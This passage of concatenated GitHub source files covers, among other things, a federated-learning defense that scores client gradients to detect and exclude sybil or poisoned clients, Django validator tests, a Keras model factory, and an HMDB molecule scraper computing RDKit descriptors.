x_data_plus_steps = np.copy(x_data)\n y_data_plus_steps = np.copy(y_data)\n for x in range(num_steps):\n x_data_plus_steps = np.vstack([x_data_plus_steps, np.array(x_data[x])])\n for j in range(num_steps):\n y_data_plus_steps = np.vstack([y_data_plus_steps,np.array(y_data[j])])\n\n #print(\"\\nCheck Length of x/y_data: {}|{} vs x/y_data_plus_steps: {}|{}\\n:::: Start Loop ::::\\n\".format(x_data.shape[0],y_data.shape[0],x_data_plus_steps.shape[0],y_data_plus_steps.shape[0]))\n #print(\"x_data_plus\\n{}\".format(x_data_plus_steps))\n #print(\"y_data_plus\\n{}\".format(y_data_plus_steps))\n #use the length of original array for iterations\n for i in range(x_data.shape[0]):\n #new sliding window index\n end_ix = i + num_steps\n seq_X = x_data_plus_steps[i:end_ix]\n seq_y = y_data_plus_steps[end_ix]\n seq_y = float(seq_y)\n X.append(seq_X)\n y.append(seq_y)\n #print(\"i:{} | end_ix:{} |\\nseq_X:\\n{}|\\nseq_y:\\n{}\".format(i,end_ix,seq_X,seq_y))\n\n #print(\"Make output arrs:\\nLen of X:{}\\n\".format(len(X)))\n x_array = np.array(X)\n y_array = np.vstack([np.array(i) for i in y])\n\n print(\"Check outputs:\\nx_array shape : {}\\n{}\\n\\ny_array shape : {}\\n{}\\n\".format(x_array.shape,x_array,y_array.shape,y_array))\n return x_array, y_array\n\n\n# Takes in grad\n# Compute similarity\n# Get weightings\ndef sim(path, attack, defense, log_name,grads, num_sybils=1):\n #1. 
Get weighted vectors of ASF, FG, Manhattan, ED, and Logit\n    #Get ASF WV\n    wv_asf, alpha = asf(config.PATH, config.ATTACK, config.DEFENSE, config.LOG_NAME,grads, config.NUM_SYBILS)\n    #Get FG WV\n    wv_fg, alpha = foolsGold(config.PATH, config.ATTACK, config.DEFENSE, config.LOG_NAME,grads, config.NUM_SYBILS)\n    #Get Manhattan WV\n    wv_mn, alpha = manhattan(config.PATH, config.ATTACK, config.DEFENSE, config.LOG_NAME,grads, config.NUM_SYBILS)\n    #Get ED WV\n    wv_ed, alpha = ed(config.PATH, config.ATTACK, config.DEFENSE, config.LOG_NAME,grads, config.NUM_SYBILS)\n    #Get Logits WV\n    wv_lg, alpha = get_inv_logit(config.PATH, config.ATTACK, config.DEFENSE, config.LOG_NAME,grads, config.NUM_SYBILS)\n    #Get Jaccard WV\n    #wv_jc, alpha = jaccard(config.PATH, config.ATTACK, config.DEFENSE, config.LOG_NAME,grads, config.NUM_SYBILS)\n    #Get Norm Dist T WV\n    wv_nd_T,alpha = get_norm_dist(config.PATH, config.ATTACK, config.DEFENSE, config.LOG_NAME,grads, config.NUM_SYBILS)\n    #Get std T WV\n    wv_std,alpha = get_std(config.PATH, config.ATTACK, config.DEFENSE, config.LOG_NAME,grads, config.NUM_SYBILS)\n\n\n    #Make Train Test Data sets\n    poison_timesteps = poison_config.POISON_TIMESTEPS\n    if attack == 'label' or attack == 'backdoor':\n        if num_sybils == 1:\n            y = config.Y_25_CLIENTS_1_SYBIL\n        elif num_sybils == 5:\n            y = config.Y_25_CLIENTS_5_SYBIL\n        else:\n            y = config.Y_25_CLIENTS_10_SYBIL\n    elif attack == 'dba':\n        if num_sybils == 1:\n            y = config.Y_25_CLIENTS_4_SYBIL\n        elif num_sybils == 5:\n            y = config.Y_25_CLIENTS_20_SYBIL\n        else:\n            y = config.Y_25_CLIENTS_40_SYBIL\n\n    print(\"\\ny shape {}\\n\".format(y.shape))\n    print(y)\n    wv_asf = np.array(wv_asf)\n    print(\"\\nwv_asf shape {}\\n\".format(wv_asf.shape))\n    print(wv_asf)\n    wv_fg = np.array(wv_fg)\n    print(\"\\nwv_fg shape {}\\n\".format(wv_fg.shape))\n    print(wv_fg)\n    wv_mn = np.array(wv_mn)\n    print(\"\\nwv_mn shape {}\\n\".format(wv_mn.shape))\n    print(wv_mn)\n    wv_ed = np.array(wv_ed)\n    print(\"\\nwv_ed shape {}\\n\".format(wv_ed.shape))\n    print(wv_ed)\n\n    wv_lg = np.array(wv_lg)\n    print(\"\\nwv_lg shape {}\\n\".format(wv_lg.shape))\n    print(wv_lg)\n\n    #wv_jc = np.array(wv_jc)\n    #print(\"\\nwv_jc shape {}\\n\".format(wv_jc.shape))\n    #print(wv_jc)\n    wv_nd_T = np.array(wv_nd_T)\n    print(\"\\nwv_nd_T shape {}\\n\".format(wv_nd_T.shape))\n    print(wv_nd_T)\n    wv_std = np.array(wv_std)\n    print(\"\\nwv_std shape {}\\n\".format(wv_std.shape))\n    print(wv_std)\n\n    x = np.column_stack((wv_asf,wv_fg))\n    xmn = np.column_stack((x,wv_mn))\n    xed = np.column_stack((xmn,wv_ed))\n    xlg = np.column_stack((xed,wv_lg))\n    #xjc = np.column_stack((xlg,wv_jc))\n    xndT = np.column_stack((xlg,wv_nd_T))\n    xstd = np.column_stack((xndT,wv_std))\n    xy = np.column_stack((xstd,y))\n\n    print(\"\\nxy shape: {}\\n{}\".format(xy.shape,xy))\n    rows, cols = xy.shape\n    xy = np.nan_to_num(xy, nan=np.nanmean(xy))\n    for i in range(rows):\n        asf_val = xy[i][0]\n        fg_val = xy[i][1]\n        mn_val = xy[i][2]\n        ed_val = xy[i][3]\n        lg_val = xy[i][4]\n        #jc_val = xy[i][5]\n        ndT_val = xy[i][5]\n        std_val = xy[i][6]\n        y_val = xy[i][7]\n        list_data = [asf_val,fg_val,mn_val,ed_val,lg_val,ndT_val,std_val,y_val]\n        with open(config.PATH +'poison_training.csv' ,'a',newline='') as f_object:\n            writer_object = writer(f_object)\n            writer_object.writerow(list_data)\n            f_object.close()\n\n    with open(path + attack +'_'+ str(num_sybils) 
+'_sybil_'+ defense +'_poison_model_'+ log_name,'a') as f:\n f.write(\"\\ny shape {}\\n\".format(y.shape))\n f.write(str(y))\n f.write(\"\\nwv_asf shape {}\\n\".format(wv_asf.shape))\n f.write(str(wv_asf))\n f.write(\"\\nwv_fg shape {}\\n\".format(wv_fg.shape))\n f.write(str(wv_fg))\n f.write(\"\\nwv_mn shape {}\\n\".format(wv_mn.shape))\n f.write(str(wv_mn))\n f.write(\"\\nwv_ed shape {}\\n\".format(wv_ed.shape))\n f.write(str(wv_ed))\n f.write(\"\\nwv_lg shape {}\\n\".format(wv_lg.shape))\n f.write(str(wv_lg))\n #f.write(\"\\nwv_jc shape {}\\n\".format(wv_jc.shape))\n #f.write(str(wv_jc))\n f.write(\"\\nwv_ndT shape {}\\n\".format(wv_nd_T.shape))\n f.write(str(wv_nd_T))\n f.write(\"\\nwv_std shape {}\\n\".format(wv_std.shape))\n f.write(str(wv_std))\n f.write(\"\\nxy shape: {}\\n{}\".format(xy.shape,xy))\n f.close()\n\n '''\n if attack == 'label' or attack == 'backdoor':\n if num_sybils == 1:\n train, test = train_test_split(xy, test_size = 8, train_size= 18)\n elif num_sybils == 5:\n train, test = train_test_split(xy, test_size = 10, train_size= 20)\n else:\n train, test = train_test_split(xy, test_size = 12, train_size= 23)\n if attack == 'dba':\n if num_sybils == 1:\n train, test = train_test_split(xy, test_size = 9, train_size= 20)\n elif num_sybils == 5:\n train, test = train_test_split(xy, test_size = 15, train_size= 30)\n else:\n train, test = train_test_split(xy, test_size = 20, train_size= 45)\n '''\n #print(\"train shape after tts {}\".format(train.shape))\n #print(train)\n #print(\"test shape after tts {}\".format(test.shape))\n #print(test)\n\n ##### to categorical if you want to use softmax\n #CLASSES = ['1.0', '0.0']\n # this is one hot encoding for binary classificaiton\n #y_train = np.array(keras.utils.to_categorical(y_train, len(CLASSES)))\n #y_test = np.array(keras.utils.to_categorical(y_test, len(CLASSES)))\n \n #y_train = np.asarray(y_train)\n #y_test = np.asarray(y_test)\n\n #REMOVE LABEL FROM X remove features from Y\n #TODO ##################################################################\n #######################################################################\n # do y's one time for each feature......................................((((((()))))))\n '''\n x_train = np.delete(train,poison_config.POISON_FEATURES,1)\n y_train_asf_rm = np.delete(train,0,1)\n y_train_fg_rm = np.delete(y_train_asf_rm,0,1)\n y_train_mn_rm = np.delete(y_train_fg_rm,0,1)\n y_train_ed_rm = np.delete(y_train_mn_rm,0,1)\n y_train_lg_rm = np.delete(y_train_ed_rm,0,1)\n #y_train_jc_rm = np.delete(y_train_lg_rm,0,1)\n y_train_ndT_rm = np.delete(y_train_lg_rm,0,1)\n y_train = np.delete(y_train_ndT_rm,0,1)\n x_test = np.delete(test,poison_config.POISON_FEATURES,1)\n y_test_asf_rm = np.delete(test,0,1)\n y_test_fg_rm = np.delete(y_test_asf_rm,0,1)\n y_test_mn_rm = np.delete(y_test_fg_rm,0,1)\n y_test_ed_rm = np.delete(y_test_mn_rm,0,1)\n y_test_lg_rm = np.delete(y_test_ed_rm,0,1)\n #y_test_jc_rm = np.delete(y_test_lg_rm,0,1)\n y_test_ndT_rm = np.delete(y_test_lg_rm,0,1)\n y_test = np.delete(y_test_ndT_rm,0,1)\n '''\n #print(\"x_train shape after deletes {}\".format(x_train.shape))\n #print(x_train)\n #print(\"x_test shape after deletes {}\".format(x_test.shape))\n #print(x_test)\n #print(\"y_train shape after deletes {}\".format(y_train.shape))\n #print(y_train)\n #print(\"y_test shape after deletes {}\".format(y_test.shape))\n #print(y_test)\n\n x_full = np.delete(xy,poison_config.POISON_FEATURES,1)\n y_train_asf_rm = np.delete(xy,0,1)\n y_train_fg_rm = np.delete(y_train_asf_rm,0,1)\n 
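# keep peeling single columns off the front; after the last delete only the label column remains (labels_full)\n    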
y_train_mn_rm = np.delete(y_train_fg_rm,0,1)\n    y_train_ed_rm = np.delete(y_train_mn_rm,0,1)\n    y_train_lg_rm = np.delete(y_train_ed_rm,0,1)\n    #y_train_jc_rm = np.delete(y_train_lg_rm,0,1)\n    y_train_ndT_rm = np.delete(y_train_lg_rm,0,1)\n    labels_full = np.delete(y_train_ndT_rm,0,1)\n    # Use make timesteps for LSTM timesteps.\n    #print(\"sending x_train and y_train to make times steps {}\".format(poison_timesteps))\n    data,labels = make_sim_timesteps(np.array(x_full),np.array(labels_full),poison_timesteps)\n\n    #Reshape for LSTM model to take as tensors\n    #x_train = x_train.reshape(x_train.shape[0], poison_timesteps, config.POISON_FEATURES)\n    #x_test = x_test.reshape(x_test.shape[0], poison_timesteps, config.POISON_FEATURES)\n    #assert x_train.shape[0] == y_train.shape[0]\n    #assert x_test.shape[0] == y_test.shape[0]\n\n    xy = np.column_stack((data,labels))\n\n    if attack == 'label' or attack == 'backdoor':\n        if num_sybils == 1:\n            train, test = train_test_split(xy, test_size = 8, train_size= 18)\n        elif num_sybils == 5:\n            train, test = train_test_split(xy, test_size = 10, train_size= 20)\n        else:\n            train, test = train_test_split(xy, test_size = 12, train_size= 23)\n    elif attack == 'dba':\n        if num_sybils == 1:\n            train, test = train_test_split(xy, test_size = 9, train_size= 20)\n        elif num_sybils == 5:\n            train, test = train_test_split(xy, test_size = 15, train_size= 30)\n        else:\n            train, test = train_test_split(xy, test_size = 20, train_size= 45)\n\n    x_train = np.delete(train,poison_config.POISON_FEATURES,1)\n    y_train_asf_rm = np.delete(train,0,1)\n    y_train_fg_rm = np.delete(y_train_asf_rm,0,1)\n    y_train_mn_rm = np.delete(y_train_fg_rm,0,1)\n    y_train_ed_rm = np.delete(y_train_mn_rm,0,1)\n    y_train_lg_rm = np.delete(y_train_ed_rm,0,1)\n    #y_train_jc_rm = np.delete(y_train_lg_rm,0,1)\n    y_train_ndT_rm = np.delete(y_train_lg_rm,0,1)\n    y_train = np.delete(y_train_ndT_rm,0,1)\n    x_test = np.delete(test,poison_config.POISON_FEATURES,1)\n    y_test_asf_rm = np.delete(test,0,1)\n    y_test_fg_rm = np.delete(y_test_asf_rm,0,1)\n    y_test_mn_rm = np.delete(y_test_fg_rm,0,1)\n    y_test_ed_rm = np.delete(y_test_mn_rm,0,1)\n    y_test_lg_rm = np.delete(y_test_ed_rm,0,1)\n    #y_test_jc_rm = np.delete(y_test_lg_rm,0,1)\n    y_test_ndT_rm = np.delete(y_test_lg_rm,0,1)\n    y_test = np.delete(y_test_ndT_rm,0,1)\n\n    x_train = np.asarray(x_train)\n    x_test = np.asarray(x_test)\n    y_train = np.asarray(y_train)  # keep the labels, not a copy of the features\n    y_test = np.asarray(y_test)\n\n    data = np.asarray(data)\n    labels = np.asarray(labels)\n    # return the poison-model train/test splits plus the full sequence data\n    return x_train, x_test, y_train, y_test, data, labels\n\n# client_grads = Compute gradients from all the clients\ndef aggregate_gradients(path, attack, defense, log_name, client_grads, num_sybils=1):\n    num_clients 
= len(client_grads)\n    with open(path + attack +'_'+ str(num_sybils) +'_sybil_'+ defense +'_'+ log_name,'a') as f:\n        f.write(\"\\naggregate_gradients Total Client Grads: {}\\n\".format(num_clients))\n        f.close()\n    print(\"Aggregating Gradients for Total of Clients: {}\".format(num_clients))\n\n    grad_len = np.array(client_grads[0][-2].data.shape).prod()\n\n    grads = np.zeros((num_clients, grad_len))\n    for i in range(len(client_grads)):\n        grads[i] = np.reshape(client_grads[i][-2].data, (grad_len))\n\n    if defense == 'sim':\n        x_train, x_test, y_train, y_test, x_full, y_full = sim(config.PATH, config.ATTACK, config.DEFENSE, config.LOG_NAME,grads, config.NUM_SYBILS)\n\n    return x_train, x_test, y_train, y_test, x_full, y_full\n\ndef weight_scalling_factor(clients_trn_data, client_name):\n    local_count = 1\n    global_count = len(clients_trn_data)\n    return local_count/global_count\n\ndef scale_model_weights(weight, scalar):\n    '''function for scaling a model's weights'''\n    weight_final = []\n    steps = len(weight)\n    for i in range(steps):\n        weight_final.append(scalar * weight[i])\n    return weight_final\n\n\ndef sum_scaled_weights(path, attack, defense, log_name,scaled_weight_list, poison_factor,num_sybils=1):\n    '''Return the sum of the listed scaled weights. This is equivalent to the scaled avg of the weights.'''\n    #scale = poison_factor.numpy()\n    #print(\"poison_factor shape {}\".format(poison_factor.shape))\n    print(\"scaled_weight_list: Rows {} cols {}\".format(len(scaled_weight_list),len(scaled_weight_list[0])))\n    with open(config.PATH + config.ATTACK +'_'+ str(config.NUM_SYBILS) +'_sybil_'+ config.DEFENSE +'_poison_model_'+ config.LOG_NAME,'a') as f:\n        f.write(\"scaled_weight_list: Rows {} cols {}\".format(len(scaled_weight_list),len(scaled_weight_list[0])))\n        f.close()\n    honest_clients = []\n    for c, client_grad in enumerate(scaled_weight_list):\n        print(\"c is {} and poison[c] is : {}\".format(c, poison_factor[c]))\n        if poison_factor[c] == 1:\n            print(\"Adding node: {} value: {} to honest_clients\".format(c,poison_factor[c]))\n            with open(config.PATH + config.ATTACK +'_'+ str(config.NUM_SYBILS) +'_sybil_'+ config.DEFENSE +'_poison_model_'+ config.LOG_NAME,'a') as f:\n                f.write(\"Adding node: {} value: {} to honest_clients\".format(c,poison_factor[c]))\n                f.close()\n            honest_clients.append(client_grad)\n\n    ##################################\n    ##################################\n    ##################################\n    #### uncomment when you find a way to ensure one honest client\n    print(\"After Nodes removed: Rows {} cols {}\".format(len(honest_clients),len(honest_clients[0])))\n    with open(config.PATH + config.ATTACK +'_'+ str(config.NUM_SYBILS) +'_sybil_'+ config.DEFENSE +'_poison_model_'+ config.LOG_NAME,'a') as f:\n        f.write(\"After Nodes removed: Rows {} cols {}\".format(len(honest_clients),len(honest_clients[0])))\n        f.close()\n\n\n    avg_grad = []\n    # sum the pre-scaled grads across all honest client gradients, layer by layer\n    for grad_list_tuple in zip(*honest_clients):\n        layer_sum = tf.math.reduce_sum(grad_list_tuple, axis=0)\n        avg_grad.append(layer_sum)\n    return avg_grad\n
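\n# Worked example (hypothetical shapes): with 3 honest clients whose weights were pre-scaled by 1/3\n# via weight_scalling_factor/scale_model_weights, reduce_sum yields (w0 + w1 + w2) / 3 -- plain FedAvg.\n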
This is equivalent to the scaled average of the weights'''\n    print(\"scaled_weight_list: Rows {} cols {}\".format(len(scaled_weight_list),len(scaled_weight_list[0])))\n    avg_grad = []\n    # get the average grad across all client gradients\n    for grad_list_tuple in zip(*scaled_weight_list):\n    #for grad_list_tuple in zip(*poison_grads):\n        layer_mean = tf.math.reduce_sum(grad_list_tuple, axis=0)\n        avg_grad.append(layer_mean)\n    return avg_grad\n    \n","repo_name":"dunhamc13/TimeSeries","sub_path":"fl_ss_utils.py","file_name":"fl_ss_utils.py","file_ext":"py","file_size_in_byte":51832,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"23075782439","text":"\"\"\" This module tests the functions in validators.py in the booking app. \"\"\"\n\nimport datetime\nfrom django.test import TestCase\nfrom django.core.exceptions import ValidationError\nfrom . import validators\n\n\nclass TestValidators(TestCase):\n    \"\"\"\n    Contains the tests for the validators used in the BookingForm.\n    Located in the booking directory in validators.py.\n    \"\"\"\n    def test_future_date_validates(self):\n        \"\"\"\n        Using the datetime library, stores today's date in a variable.\n        Then adds one day to this variable to collect tomorrow's date.\n        Removes one day from the today variable to collect yesterday's date.\n\n        Using the 'future' variable asserts no errors are raised when\n        passed to the validate_future_date method.\n\n        Using the 'today' and 'yesterday' variables asserts ValidationErrors\n        are raised when passed to the validate_future_date method\n        \"\"\"\n        today = datetime.date.today()\n        future = today + datetime.timedelta(days=1)\n        yesterday = today - datetime.timedelta(days=1)\n\n        self.assertIsNone(validators.validate_future_date(future))\n\n        with self.assertRaises(ValidationError):\n            validators.validate_future_date(today)\n\n        with self.assertRaises(ValidationError):\n            validators.validate_future_date(yesterday)\n\n    def test_guest_size_validates(self):\n        \"\"\"\n        Creates a list of the number of guests that pass validation.\n        Iterates over this list and asserts that no errors are raised\n        when passing the integer value to the validate_guest_size method.\n\n        Then asserts that the integers 0 or 9 raise a validation error\n        when passed to the validate_guest_size method.\n        \"\"\"\n        guests = [1, 2, 3, 4, 5, 6, 7, 8]\n\n        for num in guests:\n            self.assertIsNone(validators.validate_guest_size(num))\n\n        with self.assertRaises(ValidationError):\n            validators.validate_guest_size(0)\n\n        with self.assertRaises(ValidationError):\n            validators.validate_guest_size(9)\n","repo_name":"LewisCM14/restaurant-booking-app","sub_path":"booking/test_validators.py","file_name":"test_validators.py","file_ext":"py","file_size_in_byte":2076,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"74271721851","text":"# Karl Paju IS22\r\nnumbrid = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]\r\npaaris = 0\r\npaaritu = 0\r\n\r\nfor num in numbrid:\r\n    if num % 2 == 0:\r\n        paaris += 1\r\n    else:\r\n        paaritu += 1\r\n\r\nprint(\"Even numbers: \", paaris)\r\nprint(\"Odd numbers: \", paaritu)\r\n","repo_name":"KarinEegreid/T-leht","sub_path":"Paaris_Paaritu.py","file_name":"Paaris_Paaritu.py","file_ext":"py","file_size_in_byte":255,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"2885874333","text":"from keras import applications\nfrom keras.models import Sequential, Model\nfrom keras.layers import Dropout, Flatten,
Dense\n\ndef models_factory(model_type, image_size):\n\n    if model_type == \"vgg16\":\n        base_model = applications.VGG16(weights = 'imagenet', include_top = False, input_shape = (image_size[0], image_size[1], 3))\n    elif model_type == \"vgg19\":\n        base_model = applications.VGG19(weights = 'imagenet', include_top = False, input_shape = (image_size[0], image_size[1], 3))\n    elif model_type == \"resnet50\":\n        base_model = applications.ResNet50(weights = 'imagenet', include_top = False, input_shape = (image_size[0], image_size[1], 3))\n    elif model_type == \"inceptionv3\":\n        base_model = applications.InceptionV3(weights = 'imagenet', include_top = False, input_shape = (image_size[0], image_size[1], 3))\n    elif model_type == \"xception\":\n        base_model = applications.Xception(weights = 'imagenet', include_top = False, input_shape = (image_size[0], image_size[1], 3))\n    elif model_type == \"mobilenet\":\n        base_model = applications.MobileNet(weights = 'imagenet', include_top = False, input_shape = (image_size[0], image_size[1], 3))\n    elif model_type == \"inceptionresnetv2\":\n        base_model = applications.InceptionResNetV2(weights = 'imagenet', include_top = False, input_shape = (image_size[0], image_size[1], 3))\n    elif model_type == \"nasnet\":\n        base_model = applications.nasnet.NASNetLarge(weights = 'imagenet', include_top = False, input_shape = (image_size[0], image_size[1], 3))\n\n    for layer in base_model.layers:\n        layer.trainable = False\n    \n    top_model = Sequential()\n    top_model.add(Flatten(input_shape=base_model.output_shape[1:]))\n    top_model.add(Dense(1024, kernel_initializer = 'glorot_uniform', activation='relu'))\n    top_model.add(Dense(1024, kernel_initializer = 'glorot_uniform', activation='relu'))\n    top_model.add(Dense(1, activation = 'sigmoid'))\n    model = Model(inputs = base_model.input, outputs = top_model(base_model.output))\n\n    return model, base_model","repo_name":"samsachdeva183/image_classification","sub_path":"src/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2062,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"3014351550","text":"# write a function that takes a filename and returns the number of lines the\n# file contains.
It should return zero if the file does not exist.\n\ndef file_reader(file):\n\ttry:\n\t\twith open(file) as f:\n\t\t\treturn len(f.readlines())\n\texcept FileNotFoundError:\n\t\treturn 0\n\nprint(file_reader(\"open.txt\"))","repo_name":"greenfox-velox/szepnapot","sub_path":"week-05/3-exceptions/2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":292,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"40205933715","text":"from pysimm import system, lmps\nfrom pysimm.apps.random_walk import random_walk\n\n\ndef monomer(ff, is_capped=False):\n    try:\n        s = system.read_pubchem_smiles('CC(C)C(=O)OC')\n    except:\n        import os\n        s = system.read_mol(os.path.join(os.path.dirname(os.path.realpath(__file__)), os.pardir, 'topologies', 'CC(C)C(=O)OC.mol'))\n    \n    s.apply_forcefield(ff)\n    \n    c3 = s.particles[3]\n    c4 = s.particles[4]\n\n    if not is_capped:\n        for b in c3.bonds:\n            if b.a.elem == 'H' or b.b.elem == 'H':\n                pb = b.a if b.b is c3 else b.b\n                s.particles.remove(pb.tag, update=False)\n                break\n\n        for b in c4.bonds:\n            if b.a.elem == 'H' or b.b.elem == 'H':\n                pb = b.a if b.b is c4 else b.b\n                s.particles.remove(pb.tag, update=False)\n                break\n        s.remove_spare_bonding()\n\n    s.set_box(padding=10)\n    \n    c3.linker = 'head'\n    c4.linker = 'tail'\n    \n    lmps.quick_min(s, min_style='fire')\n    s.add_particle_bonding()\n    \n    return s\n\n\ndef polymer_chain(length, ff):\n    return random_walk(monomer(ff), length, forcefield=ff)","repo_name":"polysimtools/pysimm","sub_path":"pysimm/models/monomers/ff_typers/pmma.py","file_name":"pmma.py","file_ext":"py","file_size_in_byte":1153,"program_lang":"python","lang":"en","doc_type":"code","stars":69,"dataset":"github-code","pt":"78"} +{"seq_id":"29440795752","text":"from collections import deque\r\n\r\nT = int(input())\r\nresult = []\r\nfor _ in range(T):\r\n    M, N, K = map(int, input().split(\" \"))\r\n    dx = [-1, 0, 1, 0]\r\n    dy = [0, -1, 0, 1]\r\n    temp = [[0]*M for _ in range(N)]\r\n    visited = [[0]*M for _ in range(N)]\r\n    for i in range(K):\r\n        x, y = map(int, input().split(\" \"))\r\n        temp[y][x] = 1\r\n    \r\n    s = 0\r\n    for yy in range(N):\r\n        for xx in range(M):\r\n            if temp[yy][xx] == 1 and not visited[yy][xx] == 1:\r\n                visited[yy][xx] = 1\r\n                q = deque()\r\n                q.append((xx, yy))\r\n                while q:\r\n                    x, y = q.popleft()\r\n                    for i in range(4):\r\n                        nx = x + dx[i]\r\n                        ny = y + dy[i]\r\n                        if 0 <= nx < M and 0 <= ny < N and temp[ny][nx] and not visited[ny][nx]:\r\n                            q.append((nx, ny))\r\n                            visited[ny][nx] = 1\r\n                s += 1\r\n    result.append(s)\r\n    \r\nfor i in range(len(result)):\r\n    print(result[i])","repo_name":"JoonHyug/BaekJoon","sub_path":"백준/Silver/1012.
유기농 배추/유기농 배추.py","file_name":"유기농 배추.py","file_ext":"py","file_size_in_byte":1084,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"17305495662","text":"# -*- coding: utf-8 -*-\r\n## @file main.py\r\n# @brief honeypot checker code source\r\n\r\n\r\nfrom tabulate import tabulate\r\n\r\nmain_thing = \"...data.items\"\r\nbuy_fee = \"5%\"\r\nsell_fee = \"7%\"\r\nlock_balance = \"lock_balance\"\r\nscore = \"90\"\r\nowner_balance =\"1ETH\"\r\ntop10_bauer = \"top_10_buyer\"\r\ntop10_seller = \"top10_seller\"\r\ncount_less_05 = \"count_less_05\"\r\ntotal_count = \"len(data)\"\r\nlinks_count = \"links_count\"\r\n\r\n\r\ndef draw_table(data):\r\n\r\n data_list = []\r\n\r\n for i in data:\r\n data_list.append([\r\n i[\"Name\"], i[\"Liquidity\"], i[\"Total/Less\"], i[\"Social\"],\r\n i[\"Honeypot\"], i[\"TSflag\"], i[\"TSsellable\"], i[\"Buy fee\"], i[\"Sell fee\"],\r\n i[\"Risk Level\"], i[\"Score\"], i[\"CreatedAt\"], i[\"Address\"], i[\"TSLink\"],\r\n ])\r\n\r\n columns = [\r\n \"Name\", \"Liquidity\", \"Total/Less\", \"Social\", \"Honeypot\", \"TSflag\", \"TSsellable\", \"Buy fee\",\r\n \"Sell fee\", \"Risk Level\", \"Score\", \"CreatedAt\", \"Address\", \"TSLink\"\r\n ]\r\n\r\n print(tabulate(data_list, headers=columns, showindex=\"always\"))\r\n\r\n\r\nif __name__ == '__main__':\r\n\r\n draw_table({})\r\n\r\n\r\n","repo_name":"mikhailk921/crypto_search_engine","sub_path":"src/table.py","file_name":"table.py","file_ext":"py","file_size_in_byte":1087,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"3551665470","text":"import numpy as np\n\n\ndef numpy_vectorized_efd(contour, order=10, normalize=False):\n \"\"\"Calculate elliptical Fourier descriptors for a contour.\n :param numpy.ndarray contour: A contour array of size ``[M x 2]``.\n :param int order: The order of Fourier coefficients to calculate.\n :param bool normalize: If the coefficients should be normalized;\n see references for details.\n :return: A ``[order x 4]`` array of Fourier coefficients.\n :rtype: :py:class:`numpy.ndarray`\n \"\"\"\n dxy = np.diff(contour, axis=0)\n\n dt = dxy ** 2\n dt = dt.sum(axis=1)\n dt = np.sqrt(dt)\n\n t = np.cumsum(dt)\n t = np.concatenate([([0.]), t])\n T = t[-1]\n\n phi = (2 * np.pi * t) / T\n\n orders = np.arange(1, order + 1)\n phi = phi * orders.reshape((order, -1))\n d_cos_phi = np.cos(phi[:, 1:]) - np.cos(phi[:, :-1])\n d_sin_phi = np.sin(phi[:, 1:]) - np.sin(phi[:, :-1])\n cos_phi = (dxy[:, 0] / dt) * d_cos_phi\n\n consts = T / (2 * orders * orders * np.pi * np.pi)\n a = consts * np.sum(cos_phi, axis=1)\n b = consts * np.sum((dxy[:, 0] / dt) * d_sin_phi, axis=1)\n c = consts * np.sum((dxy[:, 1] / dt) * d_cos_phi, axis=1)\n d = consts * np.sum((dxy[:, 1] / dt) * d_sin_phi, axis=1)\n\n coeffs = np.concatenate([\n a.reshape((order, 1)),\n b.reshape((order, 1)),\n c.reshape((order, 1)),\n d.reshape((order, 1))\n ], axis=1)\n\n return coeffs\n","repo_name":"SPINLab/neighborhoods-autoencoder","sub_path":"model/numpy_vectorized_efd.py","file_name":"numpy_vectorized_efd.py","file_ext":"py","file_size_in_byte":1417,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"73218963131","text":"import json\nimport time\nimport requests\nimport csv\n#import torch\nimport numpy as np\nfrom rdkit.Chem import Descriptors\nfrom rdkit import Chem\nimport os\nimport random\nimport xml\nimport xml.etree.ElementTree as ET\nfrom xml.dom.minidom 
import parse\nfrom tqdm import tqdm\n\n# Step 1: download the data and extract the numeric data\n\n\ndef get_page(url):\n    try:\n        header = {\n            \"user-agent\": \"Chrome/89.0.4381.102\"\n        }\n        response = requests.get(url, headers=header)\n        if response.status_code == 200:\n            return response.text\n        return None\n    except Exception:\n        return None\n\n\ndef get_XML(file_ids):\n    for file_id in file_ids:\n        path = \"./ms_data/msxml/{}.xml\".format(file_id)\n        if os.path.exists(path):\n            print(\"{}.xml already exists.\".format(file_id))\n            continue\n        JSONfile = get_page(\n            \"https://hmdb.ca/metabolites/{}.xml\".format(file_id))\n        if JSONfile != \"\" and JSONfile != None:\n            with open(path, \"a\") as f:\n                f.write(JSONfile)\n                print(\"{}.xml written successfully!\".format(file_id))\n        else:\n            print(\"{}.xml could not be written!!!\".format(file_id))\n        time.sleep(1)\n\n\ndef get_smile(file_name):\n    DOMTree = parse(r'./ms_data/msxml/{}'.format(file_name))\n    booklist = DOMTree.documentElement\n    books = booklist.getElementsByTagName('smiles')[0]\n    smile = books.childNodes[0].data\n    return smile\n\n\ndef get_descriptors(ids, smiles):\n    # descriptors = [\"MolLogP\", \"ExactMolWt\", \"HeavyAtomMolWt\", \"NHOHCount\", \"NOCount\", \"NumHAcceptors\", \"NumHDonors\",\n    #                \"NumHeteroatoms\", \"NumRotatableBonds\", \"NumValenceElectrons\", \"RingCount\", \"TPSA\"]\n    file = \"./ms_data/ms_des.csv\"\n    print(\"====== Start writing descriptors ======\")\n    n = len(smiles)\n    for i in tqdm(range(len(smiles))):\n        descriptor = []\n        try:\n            with open(file, \"a\") as f:\n                m = Chem.MolFromSmiles(smiles[i])\n                descriptor.append(ids[i])\n                # descriptor.append(smiles[i])\n                descriptor.append(Descriptors.MolLogP(m))\n                descriptor.append(Descriptors.ExactMolWt(m))\n                descriptor.append(Descriptors.HeavyAtomMolWt(m))\n                descriptor.append(Descriptors.NHOHCount(m))\n                descriptor.append(Descriptors.NOCount(m))\n                descriptor.append(Descriptors.NumHAcceptors(m))\n                